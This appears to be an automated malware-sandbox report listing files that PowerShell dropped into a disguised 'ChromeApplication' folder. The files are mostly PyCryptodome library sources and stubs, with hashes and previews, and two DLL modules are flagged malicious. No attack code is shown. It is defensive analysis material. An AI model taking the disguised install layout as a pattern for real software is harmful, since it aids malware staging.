                                                                                                                                                                                                  Preview:#..# Util/Padding.py : Functions to manage padding..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\Padding.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):243
                                                                                                                                                                                                  Entropy (8bit):4.823438083026704
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
                                                                                                                                                                                                  MD5:72AE5A92A5B5373240F3184324E84F6B
                                                                                                                                                                                                  SHA1:976AEA0ED87A3C086D068AE560FDB2FFCD591676
                                                                                                                                                                                                  SHA-256:ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
                                                                                                                                                                                                  SHA-512:27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\RFC1751.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21578
                                                                                                                                                                                                  Entropy (8bit):4.591349548627808
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:aPe4cRum4V+EE2tKm/8MboR6U/6LcleM6s4riu6gvZGVSRq67:DAfHQgRGVe37
                                                                                                                                                                                                  MD5:73AEDFB55D3A90F08A29CC5D0AB7E623
                                                                                                                                                                                                  SHA1:D576725EC2571123AFE056369B58063BFB9D7724
                                                                                                                                                                                                  SHA-256:DFDB8CD578E00E485AD2070F24A3CFD7B0E75C972EBA73912B0BB59D8D67193B
                                                                                                                                                                                                  SHA-512:BB63BA3D20FC92A942F16C35E0128AEB2810310F75778FD6218D037D40AFFFCF3E19FFADE08882C0EC781548EACB5588A5B5A964E96FC5753CF44A9053EAADFD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# rfc1751.py : Converts between 128-bit strings and a human-readable..# sequence of words, as defined in RFC1751: "A Convention for..# Human-Readable 128-bit Keys", by Daniel L. McDonald...#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DA

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\RFC1751.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):166
                                                                                                                                                                                                  Entropy (8bit):4.7074966574817525
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                                                                                  MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                                                                                  SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                                                                                  SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                                                                                  SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1968
                                                                                                                                                                                                  Entropy (8bit):4.96168817055765
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:KIB0jcQHMsvI/S3oCFxSawf+bBVZ4YuOr2:dFQHvoEQ+tvY
                                                                                                                                                                                                  MD5:CCD084ED08A6E3D89DC9B9ECD62D524D
                                                                                                                                                                                                  SHA1:439DDFB5344BA4510F46A29913E7764824094696
                                                                                                                                                                                                  SHA-256:98831540F44AB7137A0DE53A8A8C818DEC32F0DC9C2731912424AECCE04C07FA
                                                                                                                                                                                                  SHA-512:354925C7E294A4FEA723AEBE1F618EF8DF1A82FDE95B578C86AB8DC21473E0719832E05D8971B537633631AAF62A2C6885A0D2F1F92A584C93F96F76D8204867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_cpu_features.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2035
                                                                                                                                                                                                  Entropy (8bit):5.0956096784751965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MbWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+Mq5+RscRV:MbDqrYJALrYJHdt3EHGuIWK5+RscRV
                                                                                                                                                                                                  MD5:D4DD7789231F56101EAA341F5FD21A95
                                                                                                                                                                                                  SHA1:81FFD38FA0896E265B36EF52A15EE3BA5FAD7A75
                                                                                                                                                                                                  SHA-256:38D65295DD3E4506C462350E7766FB7D16635CC7E6A234FE0E4B14C7AF6089C6
                                                                                                                                                                                                  SHA-512:268E5FEDF74F36A2309E83B6642ACE469D7871C29F1975D4080D5992E9A29F8DFA681EEE85E7E8106E6A15A95B0D2FC336A8EDB1B81BA55F49D3F9E940E8EA89
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_cpu_features.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                  Entropy (8bit):4.354688723015057
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
                                                                                                                                                                                                  MD5:2318A22B25D0854BD019BAEF901BB42A
                                                                                                                                                                                                  SHA1:37E3185DAACB1E611F02805F63044E28779DEFFF
                                                                                                                                                                                                  SHA-256:72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
                                                                                                                                                                                                  SHA-512:B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_cpuid_c.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8704
                                                                                                                                                                                                  Entropy (8bit):5.008513190034663
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:6Ku39PERtoqPAF+GBWM8o5WJ1ks/vnpjOCD7DaD2eQ5MmGffQTQrXd:6Ku39PE5gjBWMNWJzhjOg5MVnUwN
                                                                                                                                                                                                  MD5:E198EFEBB927979BC481F8B109F64C19
                                                                                                                                                                                                  SHA1:9EF5F3DDFA2DBD72DD5F94D1CEB911CA1E446CC6
                                                                                                                                                                                                  SHA-256:0C75E88EFD4158D687A410F7318B6CE79036C4A419A538BA20E86BEBC750C72B
                                                                                                                                                                                                  SHA-512:5BD60A98F8C49BFBC1F30BBBA62BD2216FAD83DD13B4167B0EF24F7FEBFC2A03FF189C3D4754C49798970BCC21F1E9871DE61B85A7DD8498538BBB6590C81BFF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N...N...N...6R..N...1...N..6...N...N...N...1...N...1...N...1...N.......N.......N....>..N.......N..Rich.N..........PE..L...7..e...........!...%............N........ ...............................`............@..........................$..|...<%..P....@.......................P..@...`!............................... ..@............ ..h............................text............................... ..`.rdata..D.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_file_system.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2225
                                                                                                                                                                                                  Entropy (8bit):5.261890106278258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MCWOqrYJALrYJHdG43tDs3EsIG13NcuIH3z+9gNQjdod9qRh3jy:MCDqrYJALrYJHdt3EHGuIXztObQ
                                                                                                                                                                                                  MD5:4505C49A1831D0C93256DA8E78C1564B
                                                                                                                                                                                                  SHA1:63721BBAEA6BE397ADC3C4C1AA4335DBECCE215C
                                                                                                                                                                                                  SHA-256:B8FF883AA293F99710EA591A58AA8D0D03FEEEDD5AA49C560B60A05FD3D413E1
                                                                                                                                                                                                  SHA-512:3C6F8710D907EE676C8770012E4DF3542A063D40185D52EF4C93AB98E8227F2C85C353C5B82B519D97D016FE62052084E8E4FB0B8609EBB59440F85E613A2602
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_file_system.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):103
                                                                                                                                                                                                  Entropy (8bit):4.5743153977203175
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                                                                                  MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                                                                                  SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                                                                                  SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                                                                                  SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_raw_api.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10877
                                                                                                                                                                                                  Entropy (8bit):4.8802384608443194
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IPtqY6t+DqX5WZ0cKqRlpZK0Xn4n/noOKcNeJWAc:0rskrs9VqkYRt+DqX5WZrKq7pZpX4/oC
                                                                                                                                                                                                  MD5:B87B25D98E8337122AE998F9ABF4D2B1
                                                                                                                                                                                                  SHA1:9B3FC679A26A4300CAE579BACB9AF93677426927
                                                                                                                                                                                                  SHA-256:67E1B4E201861F9A86E2DB1E548909CDEE46892CDCE59B3575CD9C7FF755BD54
                                                                                                                                                                                                  SHA-512:B15ADEB7D2FC9A050E80499A2CA1D0FD7203E24523C1DF591012AF01E9118B98D384DE0429612D2FEB4D8B9563FBC31A501FE4EE7C53BA2B590DE0A3A0F077F5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_raw_api.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):933
                                                                                                                                                                                                  Entropy (8bit):4.777842095513583
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                                                                                  MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                                                                                  SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                                                                                  SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                                                                                  SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_strxor.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8704
                                                                                                                                                                                                  Entropy (8bit):4.962980810410063
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:UKu39PERtoqPAF+GBWM8o5WJ1ks/vnpjOVJ5ApMmGffQTQrXd:UKu39PE5gjBWMNWJzhjOVoMVn0wN
                                                                                                                                                                                                  MD5:1B6AB07C1EA3F1A5F28DB01750AC150F
                                                                                                                                                                                                  SHA1:F477F97925C51BBB4E0DE498700E4589BEB88F51
                                                                                                                                                                                                  SHA-256:08558063C68B9A3C5006F5D78852ECB6CAF6A246CF268E23725DF2DDF7B7F67B
                                                                                                                                                                                                  SHA-512:695B5C48D922E66BFAF1518623E7CFA68F8BD0909F310FD2A494D9DB13DAD34D2C6A9BF23294A5C6990CA4EBAC2BD09D50D5B0E31BD162A7337CC04A9AA8A4C7
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N...N...N...6R..N...1...N..6...N...N...N...1...N...1...N...1...N.......N.......N....>..N.......N..Rich.N..........PE..L...9..e...........!...%............N........ ...............................`............@..........................$..t...4%..P....@.......................P..@...`!............................... ..@............ ..h............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\asn1.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37233
                                                                                                                                                                                                  Entropy (8bit):4.49642341890235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:pdRLPqWbhH6msz9l3UquMwES5LItw+8hlx:pdRVHU9lkquMwES5LD+8Tx
                                                                                                                                                                                                  MD5:9D11029C7D2E1C72C06B462CA3AA996B
                                                                                                                                                                                                  SHA1:E783B5F0CC01BC86D0C16D3B4F54300D57C214C8
                                                                                                                                                                                                  SHA-256:EEDE3556B282CDC640281A6AB6DF6C7EE20F9BE59C37B01AC09EA32F0F35887E
                                                                                                                                                                                                  SHA-512:33D713F6CA8260831AD984D88F279441819308D7C9A3F7A92770D0731BDD74F90EFA46124FAAEACFE74EEACB84D1F6217CA6D01DED3270DF53A5C7D2311B535F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: ascii -*-..#..# Util/asn1.py : Minimal support for ASN.1 DER binary encoding...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\asn1.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3885
                                                                                                                                                                                                  Entropy (8bit):4.815634844501543
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                                                                                  MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                                                                                  SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                                                                                  SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                                                                                  SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\number.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):97896
                                                                                                                                                                                                  Entropy (8bit):4.090850897275891
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:EnYL5QeQEUkknbkEEpeoc06BsJ7rajyCJrOiVDtT5U1464iPpAji6R449qVnSPt4:0YTXrtNajhJrOs5uPqe6CJn6KEVama39
                                                                                                                                                                                                  MD5:3602B83C3AC94CFAAFA24C3A8C41895B
                                                                                                                                                                                                  SHA1:5F4C1EB93B011F12A117C509CE7A878420D19307
                                                                                                                                                                                                  SHA-256:6CE48B150797316B1DC24B6AD759F0A3F2D3D6DA339E5BCCEDEC9342800450E5
                                                                                                                                                                                                  SHA-512:BC2F5B9DEB7D7678A67092CCCB1BEEA42E2B6BD9E028F9764C675340E247A8967D7704F054A1E4035C9698C8F7DD4FB3548502E157892E2DE36ADF917C3BD311
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# number.py : Number-theoretic functions..#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling, Barry A. Warsaw, and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\number.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                  Entropy (8bit):4.898132103946567
                                                                                                                                                                                                  Encrypted:false
